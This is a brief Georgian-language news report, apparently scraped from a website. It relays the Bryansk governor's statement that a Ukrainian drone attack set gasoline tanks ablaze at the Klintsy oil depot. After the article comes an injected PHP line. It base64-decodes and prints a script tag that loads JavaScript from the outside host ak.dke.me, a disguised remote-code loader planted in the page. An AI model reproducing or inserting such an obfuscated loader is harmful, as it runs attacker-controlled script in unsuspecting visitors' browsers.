celsiusi
ავერსი საქკაბელი

უკრაინული უპილოტო საფრენი აპარატის თავდასხმის შემდეგ ბრიანსკის ოლქში, კლინცის ნავთობის საცავში ხანძარი გაჩნდა, – ამის შესახებ ბრიანსკის ოლქის გუბერნატორმა, ალექსანდრ ბოგომაზმა განაცხადა.

ალექსანდრ ბოგომაზის ცნობით, ნავთობის საცავში, სადაც უკრაინულმა უპილოტო საფრენმა აპარატმა საბრძოლო მასალა ჩამოაგდო, ხანძრი ათას კვადრატულ მეტრ ფართობზეა გავრცელებული.

„იწვის ბენზინის ოთხი ავზი, მათი საერთო მოცულობა ექვსი ათასი კუბური მეტრია“, – აღნიშნა ბოგომაზმა.

ბოგომაზის თქმით, წინასწარი ინფორმაციით, მსხვერპლი არ არის. ადგილზე მუშაობენ სახანძრო და სამაშველო ჯგუფები.

როგორც ბრიანსკის ოლქის ხელმძღვანელმა განაცხადა, ეს იყო უკრაინის თავდასხმის მცდელობა კლინცის ტერიტორიაზე მდებარე ობიექტებზე.

მისივე თქმით, კლინცის ნავთობის საწყობის ტერიტორიაზე საბრძოლო მასალის ფრაგმენტები საჰაერო სამიზნის განადგურების დროს ჩამოვარდა.

246
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");